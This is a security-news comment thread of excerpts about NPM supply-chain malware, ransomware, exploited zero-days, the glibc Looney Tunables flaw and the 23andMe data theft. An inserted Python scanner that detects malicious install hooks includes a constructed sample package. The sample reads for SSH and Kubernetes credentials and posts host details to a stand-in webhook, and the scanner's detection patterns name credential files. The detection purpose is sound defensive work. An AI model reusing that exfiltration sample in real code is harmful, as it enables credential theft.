Impacted parties: Any individuals or institutions that have these malicious packages installed
Impact: Leak of credentials, sensitive information, source code, etc.
Severity level: High
Over the past few months, the FortiGuard Labs team has discovered several malicious packages hidden in NPM (Node Package Manager), the largest software registry for the JavaScript programming language. These packages were found through a system dedicated to discover malicious open-source packages from various ecosystems e.g. PyPI, NPM. In this blog, we will look at some of these packages, grouping them based on similar styles of code or functions.
In general, most of these malicious packages use install scripts that run pre or post-install. Whenever an NPM package is installed, those scripts are run as well. An example of this is shown below.
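Added example (editor's note, not part of the comment above and not code from Fortinet): the hook the article describes is the NPM lifecycle script, which runs automatically at install time. The scanner below reads package manifests, lists their lifecycle scripts, and flags the behaviours Fortinet attributes to these packages (credential and config file paths, host fingerprinting, hard-coded upload endpoints). The indicator regexes are my own heuristics, not Fortinet's signatures, and the two sample packages are constructed inline; scan_node_modules() applies the same audit to a real checkout.

```python
# Added example, not code from Fortinet or the original post. Audits NPM
# package manifests for lifecycle scripts and the behaviours the article
# describes. Indicator patterns are constructed heuristics; sample packages
# are constructed inline.
import json
import os
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (regex, label) pairs: constructed heuristics, not Fortinet's detection logic.
INDICATORS = [
    (r"\.ssh\b|id_rsa|\.kube\b|kubeconfig|\.aws\b|\.npmrc", "credential/config file path"),
    (r"\bos\.(hostname|userInfo|networkInterfaces|homedir)\s*\(", "host fingerprinting"),
    (r"https?://[^\s'\"`]+", "hard-coded URL"),
    (r"webhook|api\.telegram\.org|discord", "webhook/upload endpoint"),
    (r"\beval\s*\(|new\s+Function\s*\(|\\x[0-9a-f]{2}\\x[0-9a-f]{2}", "obfuscation / dynamic code"),
    (r"child_process|execSync|spawn\s*\(", "spawns processes"),
]


def lifecycle_scripts(manifest: dict) -> dict:
    """Lifecycle hooks declared in package.json, in the order NPM runs them."""
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in LIFECYCLE_HOOKS if hook in scripts}


def audit_package(manifest_text: str, files: dict) -> dict:
    """files maps JS file name -> content for the package's top-level scripts."""
    manifest = json.loads(manifest_text)
    hooks = lifecycle_scripts(manifest)
    corpus = "\n".join(hooks.values()) + "\n" + "\n".join(files.values())
    hits = sorted({label for pattern, label in INDICATORS if re.search(pattern, corpus)})
    return {
        "name": manifest.get("name", "?"),
        "hooks": hooks,
        "indicators": hits,
        # A lifecycle hook plus two or more behaviour categories is worth a manual look.
        "suspicious": bool(hooks) and len(hits) >= 2,
    }


def scan_node_modules(root: str) -> list:
    """Audit every package.json under root, reading the .js files beside it."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8", errors="replace") as fh:
            manifest_text = fh.read()
        files = {}
        for fn in filenames:
            if fn.endswith(".js"):
                with open(os.path.join(dirpath, fn), encoding="utf-8", errors="replace") as fh:
                    files[fn] = fh.read()
        try:
            results.append(audit_package(manifest_text, files))
        except json.JSONDecodeError:
            continue
    return results


# Constructed samples: one ordinary native addon, one resembling the behaviour
# the article describes (fingerprint the host, look for SSH/Kubernetes config,
# post to a webhook). The second is a stub for detection purposes only.
SAMPLE_PACKAGES = {
    "benign-native-addon": (
        json.dumps({"name": "benign-native-addon", "version": "1.0.0",
                    "scripts": {"postinstall": "node-gyp rebuild"}}),
        {"index.js": "module.exports = require('./build/Release/addon.node');\n"},
    ),
    "suspicious-helper": (
        json.dumps({"name": "suspicious-helper", "version": "0.0.3",
                    "scripts": {"preinstall": "node index.js"}}),
        {"index.js": (
            "// constructed sample, not a real package\n"
            "const os = require('os'); const fs = require('fs');\n"
            "const info = { host: os.hostname(), user: os.userInfo().username };\n"
            "info.ssh = fs.existsSync(os.homedir() + '/.ssh/id_rsa');\n"
            "info.kube = fs.existsSync(os.homedir() + '/.kube/config');\n"
            "fetch('https://hooks.example.invalid/webhook', { method: 'POST', body: JSON.stringify(info) });\n"
        )},
    ),
}


def audit_all(packages=SAMPLE_PACKAGES) -> dict:
    return {name: audit_package(m, f) for name, (m, f) in packages.items()}


if __name__ == "__main__":
    for name, result in audit_all().items():
        flag = "SUSPICIOUS" if result["suspicious"] else "ok"
        print(f"{name:22s} {flag:10s} hooks={list(result['hooks'])} indicators={result['indicators']}")
```

Heuristics like these are a triage aid, not a verdict: plenty of legitimate packages have a postinstall hook, and obfuscated payloads can hide the strings matched here. The more robust control is to install with scripts disabled (npm install --ignore-scripts) in CI and on developer machines, and to enable scripts only for the few packages that genuinely need a build step.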
Tomi Engdahl says:
Motel One Discloses Ransomware Attack Impacting Customer Data
https://www.securityweek.com/motel-one-discloses-ransomware-attack-impacting-customer-data/
Motel One says customer addresses and credit card information were compromised in a recent ransomware attack.
Budget hotel chain Motel One Group on Monday confirmed that some customer information and credit card data was stolen in a recent ransomware attack.
The hackers gained access to the hotel operator’s internal systems and attempted to deploy file-encrypting ransomware, but were only partially successful, the company claims.
“Thanks to extensive measures, the impact was kept to a relative minimum. The business operation of one of Europe’s largest hotel groups was never at risk,” Motel One Group says in its incident notification.
The company says it immediately engaged a certified IT security service provider and alerted the relevant authorities to start investigating the incident.
According to the hotel chain’s initial assessment, the attackers accessed information related to customers’ addresses, along with “150 credit card details”.
“The affected card holders have already been informed personally,” Motel One Group says.
While the company did not name the hackers, the AlphV/Black Cat ransomware gang over the weekend claimed responsibility for the attack, adding Motel One to its leaks site.
https://www.motel-one.com/en/corporate/press/
Tomi Engdahl says:
Mobile & Wireless
Android’s October 2023 Security Updates Patch Two Exploited Vulnerabilities
https://www.securityweek.com/androids-october-2023-update-patches-two-exploited-vulnerabilities/
The October 2023 security update for Android patches two vulnerabilities exploited in attacks, both likely linked to spyware vendors.
Google on Monday announced the release of patches for 51 vulnerabilities as part of the October 2023 security updates for Android, including fixes for two zero-day flaws exploited in malicious attacks.
The first of the exploited issues is CVE-2023-4863 (CVSS score of 8.8), a heap buffer overflow in the Libwebp library that leads to an out-of-bounds memory write and remote code execution (RCE).
In the Android security bulletin for October 2023, Google explains that the vulnerability impacts the System component and assesses it with a ‘critical’ severity rating.
While the tech giant does not provide specific information on the observed in-the-wild exploitation, the issue was identified and reported by Apple and the Citizen Lab group at The University of Torontoʼs Munk School, which often details attacks linked to commercial spyware vendors. The flaw had been exploited to deliver spyware to iPhones.
Over the past weeks, vendors have been scrambling to assess the impact of CVE-2023-4863 and address the bug. To date, Palo Alto Networks, 1Password, Microsoft, and others have released advisories.
It’s worth noting that while CVE-2023-4863 has been reportedly exploited in the wild, there are no details on attacks beyond the ones aimed at iPhones.
Android Security Bulletin—October 2023
https://source.android.com/docs/security/bulletin/2023-10-01
Tomi Engdahl says:
Glibc Dynamic Loader Hit By A Nasty Local Privilege Escalation Vulnerability – Phoronix
https://www.phoronix.com/news/Glibc-LD-Nasty-Root-Bug
A nasty vulnerability has been made public today concerning Glibc’s dynamic loader that can lead to full root privileges being obtained by local users. This affects Linux distributions of the past two years with the likes of Ubuntu 22.04 LTS, 23.04, Fedora 38, and others vulnerable to this local privilege escalation issue.
Qualys announced this vulnerability a few minutes ago:
“The GNU C Library’s dynamic loader “find[s] and load[s] the shared objects (shared libraries) needed by a program, prepare[s] the program to run, and then run[s] it” (man ld.so). The dynamic loader is extremely security sensitive, because its code runs with elevated privileges when a local user executes a set-user-ID program, a set-group-ID program, or a program with capabilities. Historically, the processing of environment variables such as LD_PRELOAD, LD_AUDIT, and LD_LIBRARY_PATH has been a fertile source of vulnerabilities in the dynamic loader.
Recently, we discovered a vulnerability (a buffer overflow) in the dynamic loader’s processing of the GLIBC_TUNABLES environment variable. This vulnerability was introduced in April 2021 (glibc 2.34) by commit 2ed18c (“Fix SXID_ERASE behavior in setuid programs (BZ #27471)”).”
Glibc updates to the major Linux distributions should begin rolling out imminently. In the interim we are already seeing actions take place such as Debian temporarily restricting access to some of their systems until they are patched against this local privilege escalation vulnerability.
Tomi Engdahl says:
Finnish websites are under attack – Russian group claimed responsibility
https://www.is.fi/digitoday/tietoturva/art-2000009900061.html
The authorities' online services are once again the target of a denial-of-service attack, Yle reports. The victims are not limited to them, however.
Various Finnish websites have been the target of a denial-of-service attack today, Wednesday, Yle reports. Such an attack means that the targeted sites may at times be difficult or impossible to reach, and the sites may otherwise run slowly.
The targets have included at least Traficom, the Finnish Transport Infrastructure Agency (Väylävirasto), the National Cyber Security Centre (Kyberturvallisuuskeskus), HSL (Helsinki Region Transport) and the ELY Centre.
In addition, OP says on its website that "The Op.fi service is experiencing a disruption caused by a denial-of-service attack. Our customers' data and money are not at risk. OP-mobiili and OP's payment cards are working normally. Our experts are currently fixing the situation. We apologise for the inconvenience caused."
Pro-Russian hacker group claims to have carried out a denial-of-service attack on Finnish sites
https://yle.fi/a/74-20053532
The group says it attacked the websites of Traficom, the Finnish Transport Infrastructure Agency and the National Cyber Security Centre, among others.
Several Finnish websites have been hit by a denial-of-service attack, for which the Russian hacker group NoName05716 has claimed responsibility on Telegram. The group posted about the denial-of-service attack on Wednesday in the early afternoon.
The group says it attacked the websites of Traficom, the Finnish Transport Infrastructure Agency, the National Cyber Security Centre, HSL and the ELY Centre, among others. The websites appear to be running either fully or partially slowly, and they have not separately reported cyberattacks.
Tomi Engdahl says:
Bill Toulas / BleepingComputer:
Oligo Security finds since-patched RCE flaws in open-source AI model-serving tool TorchServe and vulnerable instances at tens of thousands of IP addresses — A set of critical vulnerabilities dubbed ‘ShellTorch’ in the open-source T
ShellTorch flaws expose AI servers to code execution attacks
https://www.bleepingcomputer.com/news/security/shelltorch-flaws-expose-ai-servers-to-code-execution-attacks/
A set of critical vulnerabilities dubbed ‘ShellTorch’ in the open-source TorchServe AI model-serving tool impact tens of thousands of internet-exposed servers, some of which belong to large organizations.
TorchServe, maintained by Meta and Amazon, is a popular tool for serving and scaling PyTorch (machine learning framework) models in production.
Tomi Engdahl says:
New ‘Looney Tunables’ Linux bug gives root on major distros
https://www.bleepingcomputer.com/news/security/new-looney-tunables-linux-bug-gives-root-on-major-distros/
A new Linux vulnerability known as ‘Looney Tunables’ enables local attackers to gain root privileges by exploiting a buffer overflow weakness in the GNU C Library’s ld.so dynamic loader.
The GNU C Library (glibc) is the GNU system’s C library and is in most Linux kernel-based systems. It provides essential functionality, including system calls like open, malloc, printf, exit, and others, necessary for typical program execution.
The dynamic loader within glibc is of utmost importance, as it is responsible for program preparation and execution on Linux systems that use glibc.
Discovered by the Qualys Threat Research Unit, the flaw (CVE-2023-4911) was introduced in April 2021, with the release of glibc 2.34, via a commit described as fixing SXID_ERASE behavior in setuid programs.
“Our successful exploitation, leading to full root privileges on major distributions like Fedora, Ubuntu, and Debian, highlights this vulnerability’s severity and widespread nature,” said Saeed Abbasi, Product Manager at Qualys’ Threat Research Unit.
Tomi Engdahl says:
Atlassian patches critical Confluence zero-day exploited in attacks
https://www.bleepingcomputer.com/news/security/atlassian-patches-critical-confluence-zero-day-exploited-in-attacks/
Australian software company Atlassian released emergency security updates to fix a maximum severity zero-day vulnerability in its Confluence Data Center and Server software, which has been exploited in attacks. “Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances,” the company said.
“Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.” Tracked as CVE-2023-22515, this critical privilege escalation flaw affects Confluence Data Center and Server 8.0.0 and later and is described as being remotely exploitable in low-complexity attacks that don’t require user interaction.
Customers using vulnerable Confluence Data Center and Server versions are advised to upgrade their instances as soon as possible to one of the fixed versions (i.e., 8.3.3 or later, 8.4.3 or later, 8.5.2 or later).
Tomi Engdahl says:
Russian hacker group claimed to have carried out a denial-of-service attack on Finland – expert: "Attacks may be exaggerated"
https://yle.fi/a/74-20053532
Several Finnish websites have been hit by a denial-of-service attack, for which the Russian hacker group NoName05716 has claimed responsibility on Telegram. The group posted about the denial-of-service attack on Wednesday in the early afternoon. The group says it attacked the websites of Traficom, the Finnish Transport Infrastructure Agency, the National Cyber Security Centre, HSL and the ELY Centre, among others. The websites appear to be running either fully or partially slowly, and they have not separately reported cyberattacks.
Later in the afternoon the hacker group published a new Telegram message, according to which it is also behind the denial-of-service attacks targeting banks.
The Bank of Finland and OP had earlier reported that their websites had been targeted by a denial-of-service attack. Samuli Könönen, an information security specialist at the Finnish Transport and Communications Agency Traficom, confirms that some websites were down for a while because of the denial-of-service attack. Könönen says the situation is quite good.
Tomi Engdahl says:
Bitsight identifies nearly 100,000 exposed industrial control systems
https://www.bitsight.com/blog/bitsight-identifies-nearly-100000-exposed-industrial-control-systems
Bitsight has identified nearly 100,000 exposed industrial control systems (ICS) owned by organizations around the world, potentially allowing an attacker to access and control physical infrastructure such as power grids, traffic light systems, security and water systems, and more. ICSs — a subset of operational technology (OT) — are used to manage industrial processes like water flow in municipal water systems, electricity transmission via power grids, and other critical processes. Critical infrastructure sectors heavily rely on ICSs to control cyber-physical systems, compounding concerns that the exposed systems identified in this research could present significant risks to organizations and communities around the world.
Tomi Engdahl says:
Cisco fixes hard-coded root credentials in Emergency Responder
https://www.bleepingcomputer.com/news/security/cisco-fixes-hard-coded-root-credentials-in-emergency-responder/
Cisco released security updates to fix a Cisco Emergency Responder (CER) vulnerability that let attackers log into unpatched systems using hard-coded credentials. CER helps organizations respond effectively to emergencies by enabling accurate location tracking of IP phones, allowing emergency calls to be routed to the appropriate Public Safety Answering Point (PSAP).
Tracked as CVE-2023-20101, the security flaw allows unauthenticated attackers to access a targeted device using the root account, which had default, static credentials that could not be modified or removed. “This vulnerability is due to the presence of static user credentials for the root account that are typically reserved for use during development,” Cisco explained in an advisory issued today.
“An attacker could exploit this vulnerability by using the account to log in to an affected system. A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands as the root user.”
Tomi Engdahl says:
LightSpy mAPT Mobile Payment System Attack
https://www.threatfabric.com/blogs/lightspy-mapt-mobile-payment-system-attack
ThreatFabric discovered the Core of the LightSpy (aka DragonEgg) Android implant and set of 14 plugins that are responsible for private data exfiltration. LightSpy was a fully-featured modular surveillance tool set with a strong focus on victim private information exfiltration such as fine location data (including building floor number) and sound recording during VOIP calls.
LightSpy is capable of payment data exfiltration from WeChat Pay backend infrastructure. LightSpy is also capable of hooking audio-related functions from WeChat to record victim’s VOIP conversations. LightSpy and AndroidControl (aka WyrmSpy) shared the same infrastructure, AndroidControl could be a successor of LightSpy. The threat actor group had active servers in China, Singapore, and Russia. We revealed that potential targets of the threat actor group could be in the APAC region.
Tomi Engdahl says:
Cyberattack on British telecom Lyca prevented customers from making calls, topping up
https://therecord.media/cyberattack-on-lyca-stops-calls
A cyberattack over the weekend has disrupted the network of British telecommunications giant Lyca and prevented customers from buying more minutes. Lyca calls itself the world’s largest international mobile virtual network operator with over 16 million customers. They offer pay-as-you-go SIM cards across 23 countries in Europe, Africa and Asia. This week, the company said it began investigations after it became aware of issues customers were having buying more call minutes and making international as well as national calls. “The issues affected all Lyca Mobile markets apart from the United States, Australia, Ukraine and Tunisia,” the company said.
“Our number one priority is ensuring the safety and security of our customers’ data, and we are urgently investigating whether any personal information may have been compromised as part of this attack. We are confident that all our records are fully encrypted, and we will keep customers updated on the outcome of our investigation as we work with our expert partners to establish the facts.”
Tomi Engdahl says:
Apple emergency update fixes new zero-day used to hack iPhones
https://www.bleepingcomputer.com/news/apple/apple-emergency-update-fixes-new-zero-day-used-to-hack-iphones/
Apple released emergency security updates to patch a new zero-day security flaw exploited in attacks targeting iPhone and iPad users. “Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6,” the company said in an advisory issued on Wednesday. The zero-day (CVE-2023-42824) is caused by a weakness discovered in the XNU kernel that enables local attackers to escalate privileges on unpatched iPhones and iPads.
While Apple said it addressed the security issue with improved checks, it has yet to reveal who found and reported the flaw. Apple also addressed a zero-day tracked as CVE-2023-5217 and caused by a heap buffer overflow weakness in the VP8 encoding of the open-source libvpx video codec library, which could allow arbitrary code execution following successful exploitation.
Tomi Engdahl says:
Sony confirms data breach impacting thousands in the U.S.
https://www.bleepingcomputer.com/news/security/sony-confirms-data-breach-impacting-thousands-in-the-us/
Sony Interactive Entertainment (Sony) has notified current and former employees and their family members about a cybersecurity breach that exposed personal information. The company sent the data breach notification to about 6,800 individuals, confirming that the intrusion occurred after an unauthorized party exploited a zero-day vulnerability in the MOVEit Transfer platform.
The zero-day is CVE-2023-34362, a critical-severity SQL injection flaw that leads to remote code execution, leveraged by the Clop ransomware in large-scale attacks that compromised numerous organizations across the world.
Clop ransomware gang added Sony Group to its list of victims in late June.
However, the firm did not provide a public statement until now.
Tomi Engdahl says:
Apple Warns of Newly Exploited iOS 17 Kernel Zero-Day
https://www.securityweek.com/apple-warns-of-newly-exploited-ios-17-kernel-zero-day/
Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.
Tomi Engdahl says:
US Executives Targeted in Phishing Attacks Exploiting Flaw in Indeed Job Platform
https://www.securityweek.com/us-executives-targeted-in-phishing-attacks-exploiting-flaw-in-indeed-job-platform/
An open redirection vulnerability in the popular job search platform Indeed has been exploited in a series of phishing attacks.
Tomi Engdahl says:
Vulnerabilities
Companies Address Impact of Exploited Libwebp Vulnerability
https://www.securityweek.com/companies-address-impact-of-exploited-libwebp-vulnerability/
Companies have addressed the impact of the exploited Libwebp vulnerability CVE-2023-4863 on their products.
Companies have been releasing advisories addressing the impact of an actively exploited Libwebp vulnerability tracked as CVE-2023-4863 and CVE-2023-5129 on their products.
The two CVEs have been assigned to the same vulnerability, but the latter was rejected shortly.
In early September, Apple announced patching a zero-day tracked as CVE-2023-41064, which can be exploited for arbitrary code execution using specially crafted images. The flaw had been leveraged as part of a zero-click exploit named BlastPass to deliver Pegasus spyware to iPhones.
A few days later, Google and Mozilla also announced updates for Chrome and Firefox, saying that an actively exploited flaw, which they both track as CVE-2023-4863, impacts the WebP component in their browsers.
Google at one point decided to assign a new CVE identifier, CVE-2023-5129, to highlight the impact on Libwebp, but the tech giant quickly rejected the new CVE, marking it as a duplicate of CVE-2023-4863.
“Google has not confirmed why it rejected the vulnerability. However, based on the fact that several vendors have already adopted CVE-2023-4863 as the CVE identifier when patching libwebp, it likely did not make sense to assign a new CVE for this versus expanding the impact of the original CVE,” Tenable’s Satnam Narang wrote in a blog post that attempts to clarify the link between the multiple CVEs.
Some members of the cybersecurity industry still believe separate identifiers should have been assigned to Chrome and the Libwebp library.
Libwebp is widely used, being present in all major web browsers, Linux distributions, the Electron framework, and applications such as Telegram and 1Password. Companies have started releasing advisories addressing the impact of CVE-2023-4863 on their products.
Palo Alto Networks said on Tuesday that its PAN-OS software does use the Libwebp library, but it “does not offer any scenarios required for the successful exploitation of this vulnerability and is not impacted”.
Microsoft also published an advisory on Tuesday to inform customers that CVE-2023-4863 impacts Edge, Teams for Desktop, Skype for Desktop, and Webp Image Extensions.
Microsoft’s advisory also addresses CVE-2023-5217, a different vulnerability, which impacts the Libvpx video code library. CVE-2023-5217, which has also been exploited in the wild, was patched in late September by Google and Mozilla. Microsoft has also patched the issue in its Edge browser.
CISA on Wednesday added CVE-2023-5217 to its known exploited vulnerabilities catalog.
Tomi Engdahl says:
Android’s October 2023 Security Updates Patch Two Exploited Vulnerabilities
https://www.securityweek.com/androids-october-2023-update-patches-two-exploited-vulnerabilities/
The October 2023 security update for Android patches two vulnerabilities exploited in attacks, both likely linked to spyware vendors.
Tomi Engdahl says:
Android’s October 2023 Security Updates Patch Two Exploited Vulnerabilities
https://www.securityweek.com/androids-october-2023-update-patches-two-exploited-vulnerabilities/
The October 2023 security update for Android patches two vulnerabilities exploited in attacks, both likely linked to spyware vendors.
The first of the exploited issues is CVE-2023-4863 (CVSS score of 8.8), a heap buffer overflow in the Libwebp library that leads to an out-of-bounds memory write and remote code execution (RCE).
It’s worth noting that while CVE-2023-4863 has been reportedly exploited in the wild, there are no details on attacks beyond the ones aimed at iPhones.
The second zero-day flaw addressed in Android this month is CVE-2023-4211, a bug in the Arm Mali GPU driver that allows a local non-privileged user to make “improper GPU memory processing operations to gain access to already freed memory”.
“There is evidence that this vulnerability may be under limited, targeted exploitation,” Google and Arm note in their advisories.
Tomi Engdahl says:
https://www.securityweek.com/atlassian-ships-urgent-patch-for-exploited-confluence-zero-day/
Tomi Engdahl says:
Apple Warns of Newly Exploited iOS 17 Kernel Zero-Day
https://www.securityweek.com/apple-warns-of-newly-exploited-ios-17-kernel-zero-day/
Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.
The Cupertino device maker on Wednesday rushed out a new patch to cover a pair of serious vulnerabilities and warned that one of the issues has already been exploited as zero-day in the wild.
In a barebones advisory, Apple said the exploited CVE-2023-42824 kernel vulnerability allows a local attacker to elevate privileges, suggesting it was used in an exploit chain in observed attacks.
“Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6,” the company said without providing additional details.
This is the 16th documented in-the-wild zero-day against Apple’s iOS, iPadOS and macOS-powered devices, according to data tracked by SecurityWeek. The majority of these attacks have been attributed to mercenary spyware vendors selling surveillance products.
About the security content of iOS 17.0.3 and iPadOS 17.0.3
https://support.apple.com/en-us/HT213961
Tomi Engdahl says:
New Supermicro BMC Vulnerabilities Could Expose Many Servers to Remote Attacks
https://www.securityweek.com/new-supermicro-bmc-vulnerabilities-could-expose-many-servers-to-remote-attacks/
Supermicro has released BMC IPMI firmware updates to address multiple vulnerabilities impacting select motherboard models.
Server and computer hardware giant Supermicro has released updates to address multiple vulnerabilities in Baseboard Management Controllers (BMC) IPMI firmware.
The issues (tracked as CVE-2023-40284 to CVE-2023-40290) could allow remote attackers to gain root access to the BMC system, firmware supply chain security firm Binarly, which identified the bugs, explains.
A special chip on server motherboards that support remote management, the BMC allows administrators to monitor various hardware variables and even update the UEFI system firmware. The BMC chips remain operational even if the system’s power is turned off.
The most severe of these bugs are three cross-site scripting (XSS) vulnerabilities in the BMC server frontend that could be exploited remotely, without authentication, to execute arbitrary JS code.
The flaws are tracked as CVE-2023-40284, CVE-2023-40287, and CVE-2023-40288 and, according to Supermicro’s advisory, have a CVSS score of 8.3.
Binarly REsearch Uncovers Major Vulnerabilities in Supermicro BMCs
https://binarly.io/posts/Binarly_REsearch_Uncovers_Major_Vulnerabilities_in_Supermicro_BMCs/index.html
The Binarly REsearch team has discovered multiple vulnerabilities in the Supermicro IPMI firmware component developed by ATEN. Vulnerabilities can be exploited by unauthenticated remote attackers and could result in obtaining the root of the BMC system.
BMC security on Supermicro servers shows the level of product security practices from early 2000-x and does not meet modern security standards. The attacks we are disclosing show the very low complexity of compromising BMC host OS and gaining enough privileges to deliver a persistent firmware implant to the UEFI BIOS.
For this research, we took firmware for Supermicro X11 version 1.66. As a result, a total of 7 vulnerabilities were discovered, according to Binarly estimates 4 of them with critical-severity and 3 others with high-severity scores.
Exploitation path
Typically, BMC devices have a variety of protocols that can be used to communicate with them. This usually includes SSH (or SMASH), IPMI, HTTP/HTTPS, SNMP, WSMAN and others. The attack surface of BMC devices is huge, but during this research we decided to take a closer look at the HTTP/HTTPS web server, because it is the most accessible and most likely method of exploitation for an attacker. The NSA and CISA guidance specifically highlighted the importance of isolating the BMC network from the Internet, but, as of the start of October, 2023, we observed more than 70,000 instances of Supermicro IPMI web interface still publicly available
Vulnerabilities in Supermicro BMC IPMI firmware
https://www.supermicro.com/en/support/security_BMC_IPMI_Oct_2023
Supermicro would like to acknowledge the work done by the Binarly team for discovering potential vulnerabilities in Supermicro BMC IPMI Firmware.
Remediation:
Affected Supermicro motherboard SKUs will require a BMC update to mitigate these potential vulnerabilities.
An updated BMC firmware had been created to mitigate these potential vulnerabilities. Please check BMC Firmware update and the release notes for the resolution and contact technical support for further details.
Supermicro is not aware of any malicious exploitation of these vulnerabilities in the wild.
Tomi Engdahl says:
Vulnerabilities
Severe Glibc Privilege Escalation Vulnerability Impacts Major Linux Distributions
https://www.securityweek.com/severe-glibc-privilege-escalation-vulnerability-impacts-major-linux-distributions/
A local privilege escalation vulnerability (CVE-2023-4911) in the GNU C Library (glibc) can be exploited to gain full root privileges.
Major Linux distributions such as Debian, Fedora, and Ubuntu are affected by a GNU C Library (glibc) vulnerability that could provide an attacker with full root privileges.
The C library present in GNU and most systems running the Linux kernel, glibc defines system calls and other functionality that a program typically requires.
The identified issue, named ‘Looney Tunables’ and tracked as CVE-2023-4911 (CVSS score of 7.8), impacts glibc’s dynamic loader, which is responsible for loading into memory the libraries that a program needs, linking them with the executable at runtime.
CVE-2023-4911 impacts the dynamic loader’s processing of GLIBC_TUNABLES environment variables (also referred to as ‘tunables’), which allow users to change the library’s behavior at runtime, by adjusting different parameters.
“The dynamic loader is extremely security sensitive, because its code runs with elevated privileges when a local user executes a set-user-ID program, a set-group-ID program, or a program with capabilities,” security firm Qualys, which identified the vulnerability, notes.
According to Qualys, the glibc dynamic loader’s processing of the tunables variables is susceptible to a buffer overflow that can be exploited to obtain full root privileges on an impacted system.
The issue was introduced in April 2021, with the release of glibc 2.34, and has been successfully tested on Debian 12 and 13, Fedora 37 and 38, and Ubuntu 22.04 and 23.04. Other Linux distributions might be impacted as well, except for Alpine Linux, which uses musl libc, instead of glibc.
Because the vulnerability can lead to full root privileges and is relatively easy to exploit, Qualys is not sharing its proof-of-concept (PoC) code, although it has provided an extensive technical analysis.
CVE-2023-4911: Looney Tunables – Local Privilege Escalation in the glibc’s ld.so
https://blog.qualys.com/vulnerabilities-threat-research/2023/10/03/cve-2023-4911-looney-tunables-local-privilege-escalation-in-the-glibcs-ld-so
https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
Tomi Engdahl says:
Qualcomm Patches 3 Zero-Days Reported by Google
https://www.securityweek.com/qualcomm-patches-3-zero-days-reported-by-google/
Qualcomm has patched more than two dozen vulnerabilities, including three zero-days that may have been exploited by spyware vendors.
US chip giant Qualcomm this week announced patches for more than two dozen vulnerabilities found in its products, including three zero-days reported to the company by Google cybersecurity units.
Qualcomm learned from Google’s Threat Analysis Group and Google Project Zero that flaws tracked as CVE-2023-33106, CVE-2023-33107, CVE-2023-33063 and CVE-2022-22071 “may be under limited, targeted exploitation”.
However, only three of the flaws are zero-days as CVE-2022-22071 was patched by Qualcomm in May.
No information has been shared on the attacks exploiting these vulnerabilities, but the fact that they were reported by Google suggests that they may have been exploited by commercial spyware vendors.
Google has investigated several exploit chains attributed to spyware vendors in the past few years. Threat actors have been observed using such exploits to deliver spyware to devices running Android or iOS, both of which can include Qualcomm chips.
A vast majority of the remaining vulnerabilities for which patches were announced this week by Qualcomm have been assigned ‘critical’ and ‘high’ severity ratings, but they were discovered internally by the company.
Tomi Engdahl says:
Russian hacktivist group struck Finland in a big way
https://www.is.fi/digitoday/art-2000009903674.html
Tomi Engdahl says:
DNA testing service 23andMe investigating theft of user data
https://cyberscoop.com/23andme-user-data-theft/?fbclid=IwAR0cLQcguZJheL5pix4-8GXTkef6EZ0KzNcRRq9Ou_QdNKXKhRvo9-IS1uw
A member of an online forum where stolen data is bought and sold claims to be selling a large trove of user data obtained from 23andMe.
The DNA testing company 23andMe is investigating whether a large trove of customer data was stolen from the company after information about the firm’s clients was offered for sale on a cybercrime forum earlier this week.
On Sunday, a post on a popular forum where stolen data is traded and sold claimed to have “the most valuable data you’ll ever see” and posted a link to a sample of what was described as “20 million pieces of data” from 23andMe.
In a statement to CyberScoop on Thursday, 23andMe said it was made aware that “certain 23andMe customer profile information was compiled through unauthorized access to individual 23andMe.com accounts” but that there is no “indication at this time that there has been a data security incident within our systems.”
The company said its preliminary investigation indicated that an attacker may have compiled login credentials leaked from other platforms and then recycled these credentials to access the accounts of 23andMe customers who had used the same username and password combination.
For accounts that had opted in to 23andMe’s “DNA Relatives” service — which allows users to “find and connect with genetic relatives and learn more about your family” — the attacker was able to scrape data associated with potential relatives, company officials told CyberScoop.
The exact scope of the data obtained by the attacker remains unclear
After the data was first offered for sale on Sunday, the listing was pulled down. The poster reemerged on Wednesday
The seller offered the data in 100, 1,000, 10,000 and 100,000-profile batches. The seller claimed in a message to CyberScoop that they had 13 million profiles